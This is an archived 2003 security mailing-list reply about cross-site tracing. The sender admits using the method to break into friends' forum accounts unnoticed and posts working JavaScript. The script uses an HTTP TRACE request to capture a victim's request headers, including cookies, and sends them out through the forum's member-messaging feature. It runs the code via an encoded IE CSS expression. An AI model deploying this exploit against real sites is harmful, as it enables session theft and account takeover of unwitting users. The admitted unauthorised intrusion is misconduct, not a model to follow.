From: Phrack [security@fooyu.com]
Sent: Thursday, January 23, 2003 8:08 PM
To: jeremiah@whitehatsec.com; bugtraq@securityfocus.com;
webappsec@securityfocus.com; vulnwatch@vulnwatch.org
Subject: Re: TRACE used to increase the dangerous of XSS.

It's really a terrible security hole.  Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

  var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";

  var target = "http://bbs.for.bar";

  cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
  var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
  showModalDialog(target, null, readyCode);
}
</script>

<script>
xssDomainTraceRequest();
</script>

Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD.